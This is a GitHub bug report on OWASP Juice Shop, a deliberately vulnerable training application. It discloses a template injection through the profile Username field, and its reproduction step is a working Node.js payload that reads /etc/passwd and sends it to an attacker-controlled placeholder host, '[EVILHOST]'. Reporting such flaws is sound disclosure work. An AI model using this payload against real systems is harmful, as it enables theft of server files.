### ISSUE TITLE
[🐛] Local File Leakage (non containerised instances)

### ISSUE THREAD

**Issue by ph17ur** [juice-shop/juice-shop#1653]
# :bug: Bug report

## Description
When editing the User Proifle name, it's possible to leak /etc/passwd as an HTTP request parameter to a remote server.

### Is this a regression?
Uknown.

## :microscope: Minimal Reproduction

URL: `http://localhost:3000/profile`

To reproduce this error, paste the follow into the Username field:

```#{const fs=require('fs');fs.readFile('../../../../../../../../../../../etc/passwd','utf-8',(err,data)=>{if(err){throw err}console.log(data);let dataEncoded=encodeURI(data);const https=require('http');const options={hostname:'[EVILHOST]',port:80,path:'/?param='+dataEncoded,method:'GET'};console.log(options);const req=https.request(options,res=>{console.log(`statusCode: ${res.statusCode }`);res.on('data',d=>{process.stdout.write(d)})});req.on('error',error=>{console.error(error)});req.end()});}```

(where `[EVILHOST]` is a web server under your control.

Clicking the `Set Username` button gets Node to send a `GET` request to EVILHOST with `/etc/passwd` as a URL encoded parameter.

Check EVILHOST web server logs for `/etc/passwd` contents.

## :deciduous_tree: Your Environment

<pre><code>
v14.17.2
6.14.13
</code></pre>

Tested using Juiceshop 12.8.1 on Linux Mint 20.2. under my home/ folder (as opposed to /var/www/html), using Firefox Developer 91.0b5

Trying to test this on a Digital Ocean droplet but haven't been able to configure the setup yet (it's all quite new to me).

### Additional Information

This 'feature' only works on non-containerised instances - see [`build/routes/userProfile.js:25`](https://github.com/bkimminich/juice-shop/blob/869722b9451752aaf1e9f62409eb7129bd047de0/routes/userProfile.ts#L24).

(I cobbled the code together from a couple of examples and the original version uses HTTPS / 443 but my own setup wasn't HTTPS enabled hence the HTTP / 80 reference).

**Comment by bkimminich** [comment]
Hi @ph17ur, sorry for not replying up until now. This is actually a nice catch. I was wondering if we could make this a hacking challenge, but this vuln is already kind of included in the SSRF/SSTi challenges, _I think_ ... I'll have to check if we could fix the file leakage without breaking those challenges.
